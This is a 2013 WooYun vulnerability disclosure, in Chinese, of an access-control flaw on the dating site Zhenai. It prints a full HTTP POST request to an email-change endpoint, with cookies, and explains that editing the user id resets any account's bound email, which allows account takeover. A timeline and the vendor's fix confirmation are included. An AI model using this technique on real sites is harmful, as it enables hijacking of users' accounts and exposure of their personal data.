当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021922

漏洞标题:珍爱网任意劫持他人账号查看妹纸信息

相关厂商:珍爱网

漏洞作者: 哆来咪

提交时间:2013-04-15 22:37

修复时间:2013-05-30 22:38

公开时间:2013-05-30 22:38

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-15: 细节已通知厂商并且等待厂商处理中
2013-04-17: 厂商已经确认,细节仅向厂商公开
2013-04-27: 细节向核心白帽子及相关领域专家公开
2013-05-07: 细节向普通白帽子公开
2013-05-17: 细节向实习白帽子公开
2013-05-30: 细节向公众公开

简要描述:

求码 抄家底了。。。。。。

详细说明:

album.zhenai.com
POST /personal/ajaxChangeEmail.jsps HTTP/1.1
Host: album.zhenai.com
Proxy-Connection: keep-alive
Content-Length: 33
Accept: text/plain, */*; q=0.01
Origin: http://album.zhenai.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/25.0.1349.2 Safari/537.21
Content-Type: application/x-www-form-urlencoded
Referer: http://album.zhenai.com/personal/updateEmailOfPage.jsps?updateEmail=123@126.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: sid=1kZXLJoxW6BVFDoXsnRy; SEARCHWORD=3; mid=%5E%7Emid%3D43998445%5E%7E; loginactiontime=%5E%7Eloginactiontime%3D1357958628099%5E%7E; sourceUrl=%5E%7EsourceUrl%3D%5E%7E; logininfo=%5E%7Elogininfo%3D43998445%5E%7E; rmpwd=%5E%7Eloginmode%3D%5E%7Elogininfo%3D43998445%5E%7E; otherinfo=%5E%7Eisnew%3D1%5E%7ElocalEmail%3D%5E%7E; urlkey=http%3A//register.zhenai.com/register/upLoadUserPhotoPre.jsps%3FregType%3Dphone%26towhere%3Dhttp%253A%252F%252Fprofile.zhenai.com%252Fpersonal%252FmymainPage.jsps%3Fr%3D0.9503279209305837; isEmailIntercept43998445=^~isEmail=yes^~; OrderDiscount43998445=^~hasDiscount=no^~; CHANNEL_FIRST_SEARCH=1; CHANNEL_FIRST_PAGE=1; infoprcent-43998445=55; isvalideEmail=%5E%7EvalideEmail%3D1%5E%7E; JSESSIONID=abcoeSWkDdmg8fU5nTSWt; lover=%5E%7Epage%3D2%5E%7Esize%3D1000%5E%7E; CHANNEL_PHOTO=0; CHANNEL=^~refererHost=^~channelId=40020^~subid=^~; bottomRemind=%5E%7EvisPhoto%3Dno%5E%7E; p=%5E%7Eworkcity%3D10102014%5E%7EbridgeCity%3D0%5E%7Eloginname%3D2013-01-12+10%3A43%3A48.0%5E%7Elh%3D43998445%5E%7Esex%3D0%5E%7Eemail%3D%5E%7Enickname%3D%E4%BC%9A%E5%91%9843998445%5E%7Emt%3D1%5E%7Emage%3D23%5E%7Edp%3D%5E%7Edby%3D3b7f05954d0b4889%5E%7Eemail%3Dlandaozi%40126.com%5E%7E
logininfo.email=root%40wooyun.org


修改id 43998445即可重置任意绑定邮箱

漏洞证明:

za2.jpg


za1.jpg

修复方案:

版权声明:转载请注明来源 哆来咪@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-04-17 12:10

厂商回复:

已经修改,安全无小事,谢谢哆来咪。

最新状态:

暂无